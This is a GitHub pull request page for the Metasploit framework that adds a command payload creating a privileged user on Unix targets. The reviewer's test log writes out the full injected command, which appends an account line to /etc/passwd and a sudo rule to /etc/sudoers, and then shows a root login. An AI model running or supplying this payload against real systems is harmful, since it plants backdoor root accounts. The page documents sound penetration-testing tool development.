Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added cmd useradd payload #18002

Merged
merged 18 commits into from Jun 2, 2023
Merged

Added cmd useradd payload #18002

merged 18 commits into from Jun 2, 2023

Conversation

rad10
Copy link
Contributor

@rad10 rad10 commented May 17, 2023

This is a very simple payload (One that I am surprised isnt already implemented because its so simple yet so useful) that creates a new user on the target system.

Verification

List the steps needed to make sure this thing works

  • Use a desired exploit that uses cmd payloads
  • set payload cmd/unix/useradd
  • set USER <username>
  • set PASS <password>
  • set SUDOERS true
  • exploit
  • Verify that new user exists on target
  • use exploit/linux/local/su_login
  • set SESSION <ID>
  • set PASSWORD <password>
  • run
  • Verify that new user can sudo
  • use post/multi/manage/sudo
  • set SESSION <ID>
  • set PASSWORD <password>
  • run

@bcoles
Copy link
Contributor

bcoles commented May 19, 2023

An additional optional advanced option to choose user groups would be nice too.

A common sudo configuration is to permit all users in the sudo group to privesc.

The pam_wheel PAM plugin allows only users in the wheel group to privesc.

@rad10
Copy link
Contributor Author

rad10 commented May 19, 2023

An additional optional advanced option to choose user groups would be nice too.

A common sudo configuration is to permit all users in the sudo group to privesc.

The pam_wheel PAM plugin allows only users in the wheel group to privesc.

Great idea! Got any tips on how? If experience has over corrected on anything, its to not trust the executables on the system.

@rad10
Copy link
Contributor Author

rad10 commented May 19, 2023

Also, I'm getting errors with rubocop, but no corrections being suggested. I feel like its the description, but I dont know what I should do to fix it since its just breaking rubocop

@rad10
Copy link
Contributor Author

rad10 commented May 26, 2023

So with all of this, are we good to land? Or what else are we missing?

@rad10 rad10 requested review from jvoisin and adfoster-r7 May 29, 2023 16:37
@cdelafuente-r7 cdelafuente-r7 self-assigned this May 31, 2023
cdelafuente-r7
cdelafuente-r7 reviewed May 31, 2023
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @rad10 for this payload module! I left a couple of comments for you to review before it lands.

modules/payloads/singles/cmd/unix/adduser.rb Outdated Show resolved Hide resolved
modules/payloads/singles/cmd/unix/adduser.rb Outdated Show resolved Hide resolved
rad10 and others added 2 commits May 31, 2023 13:46
@rad10 @cdelafuente-r7
Made cachesize dynamic
2fab56f 
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
@rad10 @cdelafuente-r7
Used unixcrypt to create encrypted password
0e477bd 
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
rad10 and others added 2 commits June 1, 2023 11:32
@rad10 @cdelafuente-r7
Fixed double checking of sudoers
d868d0e 
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
@rad10 @cdelafuente-r7
Gave rootmethod option better description
c336f17 
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
@cdelafuente-r7
Copy link
Contributor

Thanks @rad10 for updating this. Everything looks good to me now. I tested with a generic exploit module and verified the user was created with sudo access. I'll go ahead and land it.

  • Example output
msf6 exploit(unix/webapp/generic_exec) > set payload cmd/unix/adduser
payload => cmd/unix/adduser
msf6 exploit(unix/webapp/generic_exec) > options

Module options (exploit/unix/webapp/generic_exec):

   Name     Current Setting        Required  Description
   ----     ---------------        --------  -----------
   CHOST                           no        The local client address
   CMDURI   /test.php?cmd=XXcmdXX  yes       The full URI path with the XXcmdXX parameter
   CPORT                           no        The local client port
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80                     yes       The target port (TCP)
   SSL      false                  no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (cmd/unix/adduser):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   PASS  Metasploit$1     yes       The password for this user
   USER  metasploit       yes       The username to create


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/generic_exec) > exploit rhosts=127.0.0.1

[*] 127.0.0.1:80 - Sending HTTP request for /test.php?cmd=echo%20%27metasploit%3a%241%24Az%24kf0BaRSqaSF9ewhqk5sMa.%3a1329%3a1329%3a%3a/%3a/bin/sh%27%3e%3e/etc/passwd%3b%5b%20-f%20/etc/sudoers%20%5d%26%26%28echo%20%27metasploit%20ALL%3d%28ALL%3aALL%29%20ALL%27%3e%3e/etc/sudoers%29
[*] 127.0.0.1:80 - The server responded with HTTP CODE 200
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/generic_exec) > ssh -p2222 metasploit@127.0.0.1
[*] exec: ssh -p2222 metasploit@127.0.0.1

metasploit@127.0.0.1's password:
Linux 1afc9e99d278 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=1329(metasploit) gid=1329 groups=1329
$ sudo id
[sudo] password for metasploit:
uid=0(root) gid=0(root) groups=0(root)
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
metasploit:$1$Az$kf0BaRSqaSF9ewhqk5sMa.:1329:1329::/:/bin/sh
$ sudo cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "@include" directives:

@includedir /etc/sudoers.d
metasploit ALL=(ALL:ALL) ALL
$ exit
Connection to 127.0.0.1 closed.

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 2, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 4661e97 into rapid7:master Jun 2, 2023
31 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds a command payload module that creates a new privileged user on a *nix target system.

@rad10 rad10 deleted the useradd branch June 2, 2023 17:01
@Op3n4M3 Op3n4M3 mentioned this pull request Jul 17, 2023
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@jvoisin jvoisin Awaiting requested review from jvoisin

@adfoster-r7 adfoster-r7 Awaiting requested review from adfoster-r7

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
payload rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
8 participants
@rad10 @bcoles @cdelafuente-r7 @jvoisin @bwatters-r7 @smcintyre-r7 @adfoster-r7 @gwillcox-r7